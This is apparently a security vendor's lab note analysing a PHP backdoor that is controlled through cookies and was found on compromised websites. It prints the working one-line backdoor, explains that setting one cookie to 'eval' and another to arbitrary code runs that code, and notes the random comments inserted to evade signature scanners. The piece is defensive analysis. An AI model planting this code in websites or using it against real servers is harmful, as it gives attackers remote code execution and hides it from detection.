Simple $_COOKIE backdoor (variation)

Labs Note

There are many ways to develop a backdoor and virtually all of them share a similar goal – not to be discovered. To achieve that, some attackers are giving up on using $_POST and $_GET variables, obfuscation techniques, etc, and playing with $_COOKIE’s to execute their code remotely.

The following code is a variation sample from a relatively recent malware wave (http://labs.sucuri.net/?note=2017/03/09 0:00 described by one of our researchers, Yuliyan):

<?php /*VdJR*/if(isset($_COOKIE["uFo"]))/*VO*/{$_COOKIE["JmR"]($_COOKIE["uFo"]);/*noRM*/exit;/*uDV*/}

As you can see, it works very similarly to other backdoors that use $_POST or $_GET variables instead of $_COOKIE. In this code, you simply need to set the “uFo” and “JmR” cookies, where the “JmR” one can be “eval” while “uFo” can be the code that you want to execute.

You can also notice the random comments between the statements as an attempt to avoid detection by simple static signatures used by some anti malware solutions (those comments may vary in their content and position in the code or may not even be present). This type of injection is not limited to a particular file or directory, as during our investigation, we detected several variants scattered throughout the file system.

If your website is getting reinfected very often, there might be a backdoor somewhere and we would love to clean it for you. If you need security experts to look after your website security, let us know.

You May Also Like